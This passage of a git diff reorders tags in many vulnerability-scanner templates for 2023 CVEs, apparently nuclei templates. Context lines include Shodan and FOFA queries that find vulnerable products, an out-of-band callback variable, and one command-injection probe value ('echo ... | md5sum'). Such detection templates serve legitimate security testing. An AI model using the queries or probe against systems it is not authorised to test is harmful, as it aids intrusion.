+ tags: cve2023,cve,packetstorm,xss,moodating,moosocial
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-3845.yaml b/http/cves/2023/CVE-2023-3845.yaml
index e0224d5afe..2beec15e70 100644
--- a/http/cves/2023/CVE-2023-3845.yaml
+++ b/http/cves/2023/CVE-2023-3845.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: moosocial
product: moodating
- tags: packetstorm,cve,cve2023,xss,moodating,moosocial
+ tags: cve2023,cve,packetstorm,xss,moodating,moosocial
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-3846.yaml b/http/cves/2023/CVE-2023-3846.yaml
index cb4f2990a3..4d52419ed0 100644
--- a/http/cves/2023/CVE-2023-3846.yaml
+++ b/http/cves/2023/CVE-2023-3846.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: moosocial
product: moodating
- tags: packetstorm,cve,cve2023,xss,moodating,moosocial
+ tags: cve2023,cve,packetstorm,xss,moodating,moosocial
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-3847.yaml b/http/cves/2023/CVE-2023-3847.yaml
index c700233150..f7a728930e 100644
--- a/http/cves/2023/CVE-2023-3847.yaml
+++ b/http/cves/2023/CVE-2023-3847.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: moosocial
product: moodating
- tags: packetstorm,cve,cve2023,xss,moodating,moosocial
+ tags: cve2023,cve,packetstorm,xss,moodating,moosocial
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-3848.yaml b/http/cves/2023/CVE-2023-3848.yaml
index 09fe4430f8..d99698fe06 100644
--- a/http/cves/2023/CVE-2023-3848.yaml
+++ b/http/cves/2023/CVE-2023-3848.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: moosocial
product: moodating
- tags: packetstorm,cve,cve2023,xss,moodating,moosocial
+ tags: cve2023,cve,packetstorm,xss,moodating,moosocial
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-3849.yaml b/http/cves/2023/CVE-2023-3849.yaml
index 501f09a36d..b08eaaf9cc 100644
--- a/http/cves/2023/CVE-2023-3849.yaml
+++ b/http/cves/2023/CVE-2023-3849.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: moosocial
product: moodating
- tags: packetstorm,cve,cve2023,xss,unauth,moodating,moosocial
+ tags: cve2023,cve,packetstorm,xss,unauth,moodating,moosocial
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml
index 97d7006456..c702631f46 100644
--- a/http/cves/2023/CVE-2023-38501.yaml
+++ b/http/cves/2023/CVE-2023-38501.yaml
@@ -27,7 +27,7 @@ info:
vendor: copyparty_project
product: copyparty
shodan-query: title:"copyparty"
- tags: packetstorm,cve,cve2023,copyparty,xss,oss,copyparty_project
+ tags: cve,cve2023,packetstorm,copyparty,xss,oss,copyparty_project
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml
index 3bd30b8f12..9c7e35fece 100644
--- a/http/cves/2023/CVE-2023-38646.yaml
+++ b/http/cves/2023/CVE-2023-38646.yaml
@@ -31,7 +31,7 @@ info:
product: metabase
shodan-query: http.title:"Metabase"
fofa-query: app="Metabase"
- tags: cve,cve2023,metabase,oss,rce
+ tags: cve2023,cve,metabase,oss,rce
variables:
file: "./plugins/vertica.metabase-driver.jar"
diff --git a/http/cves/2023/CVE-2023-39002.yaml b/http/cves/2023/CVE-2023-39002.yaml
index 5bcda72f42..beb363c2b5 100644
--- a/http/cves/2023/CVE-2023-39002.yaml
+++ b/http/cves/2023/CVE-2023-39002.yaml
@@ -23,7 +23,7 @@ info:
vendor: opnsense
product: opnsense
shodan-query: title:"OPNsense"
- tags: cve,cve2023,opnsense,xss,authenticated,rce
+ tags: cve2023,cve,opnsense,xss,authenticated,rce
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml
index d71cef55b3..b7b23fa75c 100644
--- a/http/cves/2023/CVE-2023-39026.yaml
+++ b/http/cves/2023/CVE-2023-39026.yaml
@@ -30,7 +30,7 @@ info:
vendor: filemage
product: filemage
shodan-query: title:"FileMage"
- tags: packetstorm,cve,cve2023,lfi,filemage
+ tags: cve2023,cve,packetstorm,lfi,filemage
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml
index 237f118c25..b29256e266 100644
--- a/http/cves/2023/CVE-2023-39108.yaml
+++ b/http/cves/2023/CVE-2023-39108.yaml
@@ -24,7 +24,7 @@ info:
vendor: rconfig
product: rconfig
shodan-query: http.title:"rConfig"
- tags: cve,cve2023,rconfig,authenticated,ssrf,lfr
+ tags: cve2023,cve,rconfig,authenticated,ssrf,lfr
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml
index 8b1de603d3..f3a010a3c4 100644
--- a/http/cves/2023/CVE-2023-39109.yaml
+++ b/http/cves/2023/CVE-2023-39109.yaml
@@ -24,7 +24,7 @@ info:
vendor: rconfig
product: rconfig
shodan-query: http.title:"rConfig"
- tags: cve,cve2023,rconfig,authenticated,ssrf,lfi
+ tags: cve2023,cve,rconfig,authenticated,ssrf,lfi
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml
index 21ce4b1d5d..0bd8e2d948 100644
--- a/http/cves/2023/CVE-2023-39110.yaml
+++ b/http/cves/2023/CVE-2023-39110.yaml
@@ -24,7 +24,7 @@ info:
vendor: rconfig
product: rconfig
shodan-query: http.title:"rConfig"
- tags: cve,cve2023,rconfig,authenticated,ssrf,lfr
+ tags: cve2023,cve,rconfig,authenticated,ssrf,lfr
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-39120.yaml b/http/cves/2023/CVE-2023-39120.yaml
index 77564a2792..75601fef85 100644
--- a/http/cves/2023/CVE-2023-39120.yaml
+++ b/http/cves/2023/CVE-2023-39120.yaml
@@ -23,7 +23,7 @@ info:
verified: true
max-request: 1
shodan-query: title:"OpenWRT"
- tags: cve,cve2023,lfi,openwrt,nodogsplash
+ tags: cve2023,cve,lfi,openwrt,nodogsplash
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml
index 97e55c6a66..28ba976556 100644
--- a/http/cves/2023/CVE-2023-39141.yaml
+++ b/http/cves/2023/CVE-2023-39141.yaml
@@ -28,7 +28,7 @@ info:
vendor: ziahamza
product: webui-aria2
shodan-query: title:"Aria2 WebUI"
- tags: lfi,unauth,aria2,webui,ziahamza
+ tags: cve2023,cve,lfi,unauth,aria2,webui,ziahamza
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml
index c40446bd2b..468ee95312 100644
--- a/http/cves/2023/CVE-2023-39143.yaml
+++ b/http/cves/2023/CVE-2023-39143.yaml
@@ -28,7 +28,7 @@ info:
vendor: papercut
product: papercut_mf
shodan-query: html:"content="PaperCut""
- tags: cve,cve2023,lfi,papercut
+ tags: cve2023,cve,lfi,papercut
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml
index a1b1558489..7d5841aa61 100644
--- a/http/cves/2023/CVE-2023-3936.yaml
+++ b/http/cves/2023/CVE-2023-3936.yaml
@@ -27,7 +27,7 @@ info:
vendor: adenion
product: blog2social
framework: wordpress
- tags: wpscan,cve,cve2023,wordpress,wp-plugin,xss,authenticated,adenion
+ tags: cve2023,cve,wpscan,wordpress,wp-plugin,xss,authenticated,adenion
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml
index 035c9f2b4a..971a92b707 100644
--- a/http/cves/2023/CVE-2023-39361.yaml
+++ b/http/cves/2023/CVE-2023-39361.yaml
@@ -28,7 +28,7 @@ info:
vendor: cacti
product: cacti
shodan-query: title:"Login to Cacti"
- tags: cve,cve2023,cacti,sqli
+ tags: cve2023,cve,cacti,sqli
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml
index 0ecd618a76..35a7f3f792 100644
--- a/http/cves/2023/CVE-2023-39598.yaml
+++ b/http/cves/2023/CVE-2023-39598.yaml
@@ -27,7 +27,7 @@ info:
vendor: icewarp
product: webclient
shodan-query: title:"icewarp"
- tags: cve,cve2023,xss,icewarp
+ tags: cve2023,cve,xss,icewarp
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml
index ca1a14ae7c..16bd657365 100644
--- a/http/cves/2023/CVE-2023-39676.yaml
+++ b/http/cves/2023/CVE-2023-39676.yaml
@@ -27,7 +27,7 @@ info:
product: fieldpopupnewsletter
framework: prestashop
shodan-query: html:"fieldpopupnewsletter"
- tags: cve,cve2023,prestashop,xss,fieldthemes
+ tags: cve2023,cve,prestashop,xss,fieldthemes
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml
index eb45a8d275..1c43efee63 100644
--- a/http/cves/2023/CVE-2023-39677.yaml
+++ b/http/cves/2023/CVE-2023-39677.yaml
@@ -27,7 +27,7 @@ info:
product: simpleimportproduct
framework: prestashop
shodan-query: http.component:"PrestaShop"
- tags: cve,cve2023,prestashop,phpinfo,disclosure,simpleimportproduct_project
+ tags: cve2023,cve,prestashop,phpinfo,disclosure,simpleimportproduct_project
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-40208.yaml b/http/cves/2023/CVE-2023-40208.yaml
index 344223bf89..5578099882 100644
--- a/http/cves/2023/CVE-2023-40208.yaml
+++ b/http/cves/2023/CVE-2023-40208.yaml
@@ -27,7 +27,7 @@ info:
vendor: urosevic
product: stock_ticker
framework: wordpress
- tags: cve,cve2023,wordpress,wp-plugin,wpscan,wp,stock-ticker,xss,urosevic
+ tags: cve2023,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,xss,urosevic
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml
index fa14298382..762a7979b7 100644
--- a/http/cves/2023/CVE-2023-40779.yaml
+++ b/http/cves/2023/CVE-2023-40779.yaml
@@ -24,7 +24,7 @@ info:
vendor: icewarp
product: deep_castle_g2
shodan-query: title:"IceWarp"
- tags: cve,cve2023,icewarp,redirect
+ tags: cve2023,cve,icewarp,redirect
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-4110.yaml b/http/cves/2023/CVE-2023-4110.yaml
index da7ee8b64a..9d7f25e703 100644
--- a/http/cves/2023/CVE-2023-4110.yaml
+++ b/http/cves/2023/CVE-2023-4110.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: phpjabbers
product: availability_booking_calendar
- tags: packetstorm,cve,cve2023,xss,phpjabber,jabber,phpjabbers
+ tags: cve2023,cve,packetstorm,xss,phpjabber,jabber,phpjabbers
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-41109.yaml b/http/cves/2023/CVE-2023-41109.yaml
index c4a78d7374..d8771f3c0f 100644
--- a/http/cves/2023/CVE-2023-41109.yaml
+++ b/http/cves/2023/CVE-2023-41109.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: patton
product: smartnode_sn200_firmware
- tags: cve,cve2023,smartnode,voip
+ tags: cve,cve2023,smartnode,voip,patton
variables:
payload: "echo CVE-2023-41109 | md5sum"
diff --git a/http/cves/2023/CVE-2023-4111.yaml b/http/cves/2023/CVE-2023-4111.yaml
index b98a09b765..ce2adf04d6 100644
--- a/http/cves/2023/CVE-2023-4111.yaml
+++ b/http/cves/2023/CVE-2023-4111.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: phpjabbers
product: bus_reservation_system
- tags: packetstorm,cve,cve2023,xss,phpjabber,jabber,phpjabbers
+ tags: cve2023,cve,packetstorm,xss,phpjabber,jabber,phpjabbers
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml
index 819cfd1454..4b24357994 100644
--- a/http/cves/2023/CVE-2023-4112.yaml
+++ b/http/cves/2023/CVE-2023-4112.yaml
@@ -26,7 +26,7 @@ info:
vendor: phpjabbers
product: shuttle_booking_software
shodan-query: html:"PHP Jabbers.com"
- tags: packetstorm,cve,cve2023,xss,unauth,phpjabbers
+ tags: cve2023,cve,packetstorm,xss,unauth,phpjabbers
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-4113.yaml b/http/cves/2023/CVE-2023-4113.yaml
index 669dff8d69..6c892d77b3 100644
--- a/http/cves/2023/CVE-2023-4113.yaml
+++ b/http/cves/2023/CVE-2023-4113.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: phpjabbers
product: service_booking_script
- tags: packetstorm,cve,cve2023,xss,php,jabbers,phpjabbers
+ tags: cve2023,cve,packetstorm,xss,php,jabbers,phpjabbers
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-4114.yaml b/http/cves/2023/CVE-2023-4114.yaml
index 234d052198..d4ba09a184 100644
--- a/http/cves/2023/CVE-2023-4114.yaml
+++ b/http/cves/2023/CVE-2023-4114.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: phpjabbers
product: night_club_booking_software
- tags: packetstorm,cve,cve2023,xss,php,jabbers,phpjabbers
+ tags: cve2023,cve,packetstorm,xss,php,jabbers,phpjabbers
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-4115.yaml b/http/cves/2023/CVE-2023-4115.yaml
index c3c1d9c703..97522c9ccc 100644
--- a/http/cves/2023/CVE-2023-4115.yaml
+++ b/http/cves/2023/CVE-2023-4115.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: phpjabbers
product: cleaning_business_software
- tags: cve,cve2023,xss,phpjabber,jabber,phpjabbers
+ tags: cve2023,cve,xss,phpjabber,jabber,phpjabbers
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml
index a549df5f70..722a0c5e84 100644
--- a/http/cves/2023/CVE-2023-4116.yaml
+++ b/http/cves/2023/CVE-2023-4116.yaml
@@ -26,7 +26,7 @@ info:
vendor: phpjabbers
product: taxi_booking_script
shodan-query: html:"PHP Jabbers.com"
- tags: packetstorm,cve,cve2023,xss,phpjabbers
+ tags: cve,cve2023,packetstorm,xss,phpjabbers
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-41265.yaml b/http/cves/2023/CVE-2023-41265.yaml
index aaf7cccd83..5ac9883486 100644
--- a/http/cves/2023/CVE-2023-41265.yaml
+++ b/http/cves/2023/CVE-2023-41265.yaml
@@ -25,7 +25,7 @@ info:
product: qlik_sense
framework: windows
shodan-query: html:"Qlik"
- tags: cve,cve2023,kev,qlik,smuggling
+ tags: cve2023,cve,kev,qlik,smuggling,windows
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-41266.yaml b/http/cves/2023/CVE-2023-41266.yaml
index 2c15c15d61..ef18fbc98a 100644
--- a/http/cves/2023/CVE-2023-41266.yaml
+++ b/http/cves/2023/CVE-2023-41266.yaml
@@ -25,7 +25,7 @@ info:
product: qlik_sense
framework: windows
shodan-query: http.favicon.hash:-74348711
- tags: cve,cve2023,qlik,traversal,kev
+ tags: cve2023,cve,qlik,traversal,kev,windows
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-4148.yaml b/http/cves/2023/CVE-2023-4148.yaml
index 6828aba81b..2295ebed74 100644
--- a/http/cves/2023/CVE-2023-4148.yaml
+++ b/http/cves/2023/CVE-2023-4148.yaml
@@ -25,7 +25,7 @@ info:
product: ditty
framework: wordpress
publicwww-query: /wp-content/plugins/ditty-news-ticker/
- tags: cve,cve2023,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated,metaphorcreations
+ tags: cve2023,cve,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated,metaphorcreations
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-41538.yaml b/http/cves/2023/CVE-2023-41538.yaml
index 975c4d3455..e7c961b280 100644
--- a/http/cves/2023/CVE-2023-41538.yaml
+++ b/http/cves/2023/CVE-2023-41538.yaml
@@ -22,7 +22,7 @@ info:
max-request: 1
vendor: phpjabbers
product: php_forum_script
- tags: cve,cve2023,xss,phpjabber,jabber,phpjabbers
+ tags: cve2023,cve,xss,phpjabber,jabber,phpjabbers
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml
index 5821ff93ee..a55f81db92 100644
--- a/http/cves/2023/CVE-2023-4173.yaml
+++ b/http/cves/2023/CVE-2023-4173.yaml
@@ -30,7 +30,7 @@ info:
vendor: moosocial
product: moostore
fofa-query: mooSocial
- tags: packetstorm,cve,cve2023,moosocial,xss
+ tags: cve2023,cve,packetstorm,moosocial,xss
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml
index 5380d313e0..9393d815ef 100644
--- a/http/cves/2023/CVE-2023-4174.yaml
+++ b/http/cves/2023/CVE-2023-4174.yaml
@@ -30,7 +30,7 @@ info:
vendor: moosocial
product: moostore
fofa-query: icon_hash="702863115"
- tags: packetstorm,cve,cve2023,moosocial,xss
+ tags: cve,cve2023,packetstorm,moosocial,xss
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml
index 8d22b64e32..708be42dd0 100644
--- a/http/cves/2023/CVE-2023-41892.yaml
+++ b/http/cves/2023/CVE-2023-41892.yaml
@@ -28,7 +28,7 @@ info:
product: craft_cms
shodan-query: http.favicon.hash:-47932290
publicwww-query: "craftcms"
- tags: cve,cve2023,rce,unauth,craftcms
+ tags: cve2023,cve,rce,unauth,craftcms
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-42343.yaml b/http/cves/2023/CVE-2023-42343.yaml
index 0dcff613b6..c5d34f9f7a 100644
--- a/http/cves/2023/CVE-2023-42343.yaml
+++ b/http/cves/2023/CVE-2023-42343.yaml
@@ -15,7 +15,7 @@ info:
max-request: 1
shodan-query: "/opencms/"
verified: true
- tags: cve,cve2023,xss,opencms
+ tags: cve2023,cve,xss,opencms
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml
index e1cb888558..ec3d4aa6b6 100644
--- a/http/cves/2023/CVE-2023-42442.yaml
+++ b/http/cves/2023/CVE-2023-42442.yaml
@@ -26,7 +26,7 @@ info:
vendor: fit2cloud
product: jumpserver
fofa-query: title="JumpServer"
- tags: cve,cve2023,jumpserver,exposure,fit2cloud
+ tags: cve2023,cve,jumpserver,exposure,fit2cloud
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml
index bd39bc9578..589bdd35c7 100644
--- a/http/cves/2023/CVE-2023-42793.yaml
+++ b/http/cves/2023/CVE-2023-42793.yaml
@@ -27,7 +27,7 @@ info:
product: teamcity
shodan-query: title:TeamCity
fofa-query: title=TeamCity
- tags: cve,cve2023,jetbrains,teamcity,rce,auth-bypass,intrusive,kev
+ tags: cve2023,cve,jetbrains,teamcity,rce,auth-bypass,intrusive,kev
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-43261.yaml b/http/cves/2023/CVE-2023-43261.yaml
index 7c55e0f060..95443db1fb 100644
--- a/http/cves/2023/CVE-2023-43261.yaml
+++ b/http/cves/2023/CVE-2023-43261.yaml
@@ -26,7 +26,7 @@ info:
vendor: milesight
product: ur5x_firmware
shodan-query: http.html:rt_title
- tags: cve,cve2023,router,milesight,disclosure,unauth,iot
+ tags: cve2023,cve,router,milesight,disclosure,unauth,iot
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-43325.yaml b/http/cves/2023/CVE-2023-43325.yaml
index 2f1e6ee7ff..ce4a71788e 100644
--- a/http/cves/2023/CVE-2023-43325.yaml
+++ b/http/cves/2023/CVE-2023-43325.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: moosocial
product: moosocial
- tags: cve,cve2023,xss,moosocial
+ tags: cve2023,cve,xss,moosocial
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-43326.yaml b/http/cves/2023/CVE-2023-43326.yaml
index 9ad23be6fa..da14fb4de4 100644
--- a/http/cves/2023/CVE-2023-43326.yaml
+++ b/http/cves/2023/CVE-2023-43326.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: moosocial
product: moosocial
- tags: cve,cve2023,xss,moosocial
+ tags: cve2023,cve,xss,moosocial
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-43795.yaml b/http/cves/2023/CVE-2023-43795.yaml
index 32d440daca..e87343b464 100644
--- a/http/cves/2023/CVE-2023-43795.yaml
+++ b/http/cves/2023/CVE-2023-43795.yaml
@@ -25,7 +25,7 @@ info:
product: geoserver
shodan-query: title:"GeoServer"
fofa-query: app="GeoServer"
- tags: cve,cve2023,geoserver,ssrf,oast,oos,osgeo
+ tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo
variables:
oast: "{{interactsh-url}}"
string: "{{to_lower(rand_text_alpha(4))}}"
diff --git a/http/cves/2023/CVE-2023-4415.yaml b/http/cves/2023/CVE-2023-4415.yaml
index 5d2997f076..39c4276527 100644
--- a/http/cves/2023/CVE-2023-4415.yaml
+++ b/http/cves/2023/CVE-2023-4415.yaml
@@ -24,7 +24,7 @@ info:
vendor: ruijienetworks
product: rg-ew1200g_firmware
fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
- tags: cve,cve2023,ruijie,router,ruijienetworks
+ tags: cve2023,cve,ruijie,router,ruijienetworks
http:
- method: POST
diff --git a/http/cves/2023/CVE-2023-44353.yaml b/http/cves/2023/CVE-2023-44353.yaml
index 0d533a93dd..316e44c070 100644
--- a/http/cves/2023/CVE-2023-44353.yaml
+++ b/http/cves/2023/CVE-2023-44353.yaml
@@ -26,7 +26,7 @@ info:
vendor: adobe
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
- tags: cve,cve2023,adobe,coldfusion,deserialization
+ tags: cve2023,cve,adobe,coldfusion,deserialization,xss
variables:
windows_known_path: "C:\\Windows\\"
diff --git a/http/cves/2023/CVE-2023-4451.yaml b/http/cves/2023/CVE-2023-4451.yaml
index 754c98f878..68fa3647ee 100644
--- a/http/cves/2023/CVE-2023-4451.yaml
+++ b/http/cves/2023/CVE-2023-4451.yaml
@@ -25,7 +25,7 @@ info:
vendor: agentejo
product: cockpit
shodan-query: html:"Cockpit"
- tags: huntr,cve,cve2023,cockpit,xss,agentejo
+ tags: cve2023,cve,huntr,cockpit,xss,agentejo
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-45542.yaml b/http/cves/2023/CVE-2023-45542.yaml
index 6d1f6123bf..61b31289f4 100644
--- a/http/cves/2023/CVE-2023-45542.yaml
+++ b/http/cves/2023/CVE-2023-45542.yaml
@@ -22,7 +22,7 @@ info:
max-request: 1
vendor: moosocial
product: moosocial
- tags: cve,cve2023,xss,moosocial
+ tags: cve2023,cve,xss,moosocial
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml
index 729b45025f..b079060272 100644
--- a/http/cves/2023/CVE-2023-4568.yaml
+++ b/http/cves/2023/CVE-2023-4568.yaml
@@ -25,7 +25,7 @@ info:
vendor: papercut
product: papercut_ng
shodan-query: html:"content="PaperCut""
- tags: cve,cve2023,unauth,papercut
+ tags: cve2023,cve,unauth,papercut
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-45852.yaml b/http/cves/2023/CVE-2023-45852.yaml
index 2d45db608c..7d20387cda 100644
--- a/http/cves/2023/CVE-2023-45852.yaml
+++ b/http/cves/2023/CVE-2023-45852.yaml
@@ -25,7 +25,7 @@ info:
product: vitogate_300_firmware
shodan-query: title:"Vitogate 300"
fofa-query: title="Vitogate 300"
- tags: cve,cve2023,rce,vitogate,viessmann
+ tags: cve2023,cve,rce,vitogate,viessmann
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-4596.yaml b/http/cves/2023/CVE-2023-4596.yaml
index 0d9ee94cfb..0183e7373b 100644
--- a/http/cves/2023/CVE-2023-4596.yaml
+++ b/http/cves/2023/CVE-2023-4596.yaml
@@ -27,7 +27,7 @@ info:
product: forminator
framework: wordpress
publicwww-query: /wp-content/plugins/Forminator
- tags: cve,cve2023,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub
+ tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml
index 622c46cca9..9da647f748 100644
--- a/http/cves/2023/CVE-2023-4634.yaml
+++ b/http/cves/2023/CVE-2023-4634.yaml
@@ -30,7 +30,7 @@ info:
product: media_library_assistant
framework: wordpress
publicwww-query: "wp-content/plugins/media-library-assistant"
- tags: packetstorm,cve,cve2023,wordpress,wp,wp-plugin,lfi,rce,media-library-assistant,davidlingren
+ tags: cve,cve2023,packetstorm,wordpress,wp,wp-plugin,lfi,rce,media-library-assistant,davidlingren
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-46359.yaml b/http/cves/2023/CVE-2023-46359.yaml
index f563835b5d..f9d2e4f68f 100644
--- a/http/cves/2023/CVE-2023-46359.yaml
+++ b/http/cves/2023/CVE-2023-46359.yaml
@@ -18,7 +18,7 @@ info:
verified: true
max-request: 1
shodan-query: html:"Salia PLCC"
- tags: cve,cve2023,salia-plcc,cph2,rce
+ tags: cve2023,cve,salia-plcc,cph2,rce
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml
index 3d4083cdea..29a79e76b6 100644
--- a/http/cves/2023/CVE-2023-46574.yaml
+++ b/http/cves/2023/CVE-2023-46574.yaml
@@ -23,9 +23,7 @@ info:
shodan-query: title:"Totolink"
vendor: totolink
product: a3700r_firmware
- tags: cve,cve2023,totolink,router,iot,rce
-
-flow: http(1) && http(2)
+ tags: cve2023,cve,totolink,router,iot,rce
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml
index 418e182a11..ceb61788ea 100644
--- a/http/cves/2023/CVE-2023-46747.yaml
+++ b/http/cves/2023/CVE-2023-46747.yaml
@@ -25,7 +25,7 @@ info:
vendor: f5
product: big-ip_access_policy_manager
shodan-query: http.title:"BIG-IP®-+Redirect" +"Server"
- tags: packetstorm,cve,cve2023,rce,f5,bigip,unauth,ajp,smuggling,intrusive,kev
+ tags: cve2023,cve,packetstorm,rce,f5,bigip,unauth,ajp,smuggling,intrusive,kev
variables:
username: "{{hex_encode(rand_base(5))}}"
password: "{{hex_encode(rand_base(12))}}"
diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml
index 587bdcd371..1beedb7727 100644
--- a/http/cves/2023/CVE-2023-4714.yaml
+++ b/http/cves/2023/CVE-2023-4714.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: playtube
product: playtube
- tags: cve,cve2023,playtube,exposure
+ tags: cve2023,cve,playtube,exposure
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-49070.yaml b/http/cves/2023/CVE-2023-49070.yaml
index cecd466fbe..85f773308e 100644
--- a/http/cves/2023/CVE-2023-49070.yaml
+++ b/http/cves/2023/CVE-2023-49070.yaml
@@ -27,7 +27,7 @@ info:
product: ofbiz
shodan-query: html:"OFBiz"
fofa-query: app="Apache_OFBiz"
- tags: seclists,cve,cve2023,apache,ofbiz,deserialization,rce
+ tags: cve,cve2023,seclists,apache,ofbiz,deserialization,rce
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-49103.yaml b/http/cves/2023/CVE-2023-49103.yaml
index b9d3af2979..741b7f6da7 100644
--- a/http/cves/2023/CVE-2023-49103.yaml
+++ b/http/cves/2023/CVE-2023-49103.yaml
@@ -27,7 +27,7 @@ info:
vendor: owncloud
product: graph_api
shodan-query: title:"owncloud"
- tags: cve,cve2023,owncloud,phpinfo,config,kev
+ tags: cve2023,cve,owncloud,phpinfo,config,kev
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml
index da0e551126..3862bd5f26 100644
--- a/http/cves/2023/CVE-2023-4974.yaml
+++ b/http/cves/2023/CVE-2023-4974.yaml
@@ -26,7 +26,7 @@ info:
vendor: creativeitem
product: academy_lms
shodan-query: html:"Academy LMS"
- tags: packetstorm,cve,cve2023,sqli,academy,lms,creativeitem
+ tags: cve,cve2023,packetstorm,sqli,academy,lms,creativeitem
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml
index 058e084788..943874eae8 100644
--- a/http/cves/2023/CVE-2023-5074.yaml
+++ b/http/cves/2023/CVE-2023-5074.yaml
@@ -26,7 +26,7 @@ info:
product: d-view_8
shodan-query: http.favicon.hash:-1317621215
fofa-query: icon_hash="-1317621215"
- tags: cve,cve2023,d-link,auth-bypass,dlink
+ tags: cve2023,cve,d-link,auth-bypass,dlink
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-50917.yaml b/http/cves/2023/CVE-2023-50917.yaml
